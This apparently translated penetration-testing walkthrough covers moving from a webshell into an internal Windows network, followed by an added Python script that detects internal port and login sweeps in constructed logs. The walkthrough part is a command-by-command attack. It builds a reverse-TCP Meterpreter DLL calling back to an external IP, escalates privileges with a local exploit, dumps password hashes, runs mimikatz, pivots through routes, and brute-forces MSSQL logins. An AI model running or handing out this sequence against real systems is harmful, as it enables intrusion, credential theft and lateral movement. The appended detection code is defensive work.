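After obtaining a webshell, we move on to penetrating the internal network. Open msf and first generate a reverse-connection trojan:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.71.218.172 LPORT=443 -f dll > /root/Desktop/443.dll
After generating the trojan, we place it on the target through China Chopper (菜刀) and run it, while opening msf to wait for the connection back: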
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.71.218.172
set lport 443
run
Privilege escalation
background or ctrl+z
use exploit/windows/local/ms11_080_afdjoinleaf
set session 1
run
hashdump // obtain passwords
load mimikatz // use mimikatz
kerberos // view the decrypted results
Add a new route to view the subnet
route
background
sessions
route add 192.168.1.0 255.255.255.0 2
search mssql // find mssql modules
use auxiliary/scanner/mssql/mssql_login // use the login module
show options
set rhosts 192.168.1.1/24
set password sa@123
run
show options
set BRUTEFORCE_SPEED 0
run
Port scan
search portscan
use auxiliary/scanner/portscan/tcp // use the scanner module
show options
set RHOSTS 192.168.177.0/24
set ports 139,445,3389 // set the ports to scan
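
Seen from the defended network, scans sent through a Meterpreter route leave from the compromised host itself, so the login scan and port scan above show up as one internal machine fanning out to many neighbours on the same port. The following is an added detection example, not part of the original post; the log format, host addresses, thresholds and the inclusion of port 1433 (the default MSSQL port) are assumptions. It also shows why a slowed-down login scan needs a longer correlation window than a fast port sweep.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Ports from the walkthrough's port scan, plus 1433 (default MSSQL port, an assumption here).
WATCHED_PORTS = {139, 445, 1433, 3389}

def build_sample_log():
    """Constructed connection records: 'timestamp src dst dport'. All hosts are made up."""
    t0 = datetime(2024, 1, 1, 10, 0, 0)
    rows = []
    for i in range(1, 7):
        # Fast sweep: one internal host touches six neighbours on 445, one second apart.
        rows.append((t0 + timedelta(seconds=i), "192.168.1.50", f"192.168.177.{i}", 445))
        # Slow sweep: same source, six hosts on 1433, five minutes apart.
        rows.append((t0 + timedelta(minutes=5 * i), "192.168.1.50", f"192.168.1.{i}", 1433))
    # Ordinary client: two file servers on 445, must not alert.
    rows.append((t0, "192.168.1.77", "192.168.1.200", 445))
    rows.append((t0 + timedelta(seconds=30), "192.168.1.77", "192.168.1.201", 445))
    return "\n".join(f"{ts.isoformat()} {s} {d} {p}" for ts, s, d, p in rows)

def find_sweeps(log_text, min_hosts=5, window=timedelta(seconds=60)):
    """Return {(src, port): hosts} where src reached >= min_hosts distinct
    destinations on one watched port inside a sliding time window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed records instead of crashing
        ts, src, dst, port = fields
        if port.isdigit() and int(port) in WATCHED_PORTS:
            events[(src, int(port))].append((datetime.fromisoformat(ts), dst))
    alerts = {}
    for key, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Shrink the window from the left until it spans at most `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            hosts = len({dst for _, dst in hits[start:end + 1]})
            if hosts >= min_hosts:
                alerts[key] = max(alerts.get(key, 0), hosts)
    return alerts

if __name__ == "__main__":
    log = build_sample_log()
    print("60 s window:", find_sweeps(log))
    print("1 h window: ", find_sweeps(log, window=timedelta(hours=1)))
```

With the 60-second window only the fast sweep on 445 is reported; widening the window to an hour also surfaces the slow sweep on 1433.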